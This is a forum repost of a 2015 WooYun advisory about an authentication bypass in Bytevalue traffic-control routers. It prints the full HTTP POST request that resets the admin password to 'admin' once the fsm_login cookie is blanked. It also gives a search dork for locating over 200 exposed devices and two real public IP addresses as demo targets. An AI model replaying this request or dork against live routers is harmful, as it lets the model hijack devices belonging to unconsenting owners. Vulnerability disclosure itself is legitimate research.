标题:
百为流控路由管理员密码重置漏洞
[打印本页]
作者:
linda
时间:
2016-1-12 10:33
标题:
百为流控路由管理员密码重置漏洞
漏洞概要
缺陷编号:
WooYun-2015-99869
漏洞标题: 百为流控路由管理员密码重置漏洞
相关厂商:
深圳市百为百达科技开发有限公司
漏洞作者:
10457793
提交时间: 2015-03-09 12:24
公开时间: 2015-04-30 18:48
漏洞类型: 设计不当
危害等级: 高
自评Rank: 20
漏洞状态: 未联系到厂商或者厂商积极忽略
漏洞来源:
http://www.wooyun.org
Tags标签: 无
漏洞详情披露状态:
2015-03-09: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-04-30: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
RT
详细说明:
RT
案例百度可以搜索到200+
intitle:bytevalue
百度第4页至第31页都是,估计还有很多没有被检索到的。
漏洞证明:
演示地址
code 区域
http://220.161.90.230:2011/
http://61.156.217.133:2011
POST数据如下
code 区域POST /goform/webForm HTTP/1.0
Referer:
http://61.156.217.133:2011/maint/admin.htm?opener=home
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Accept: */*
Accept-Language: zh-CN
Proxy-Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: 61.156.217.133:2011
Content-Length: 52
DNT: 1
Pragma: no-cache
Cookie: fsm_u=admin; fsm_login=
cmd=MODIFY_PWD&json=%7B%22NewPwd%22%3A%22admin%22%7D
正常请求中包含fsm_login的值,为权限验证值
直接删掉fsm_login的值更换host即可绕过权限验证
修改host即可实现攻击不同目标,将admin用户密码修改为admin
返回如下信息标示修改成功
登录
修复方案:
版权声明:转载请注明来源
10457793
@
乌云
漏洞回应
厂商回应:
未能联系到厂商或者厂商积极拒绝
原文:
http://www.wooyun.org/bugs/wooyun-2015-099869
[
本帖最后由 linda 于 2016-1-12 18:35 编辑
]
欢迎光临 中神通公司技术论坛 (http://trustcomputing.com.cn/bbs/)
Powered by Discuz! 6.0.0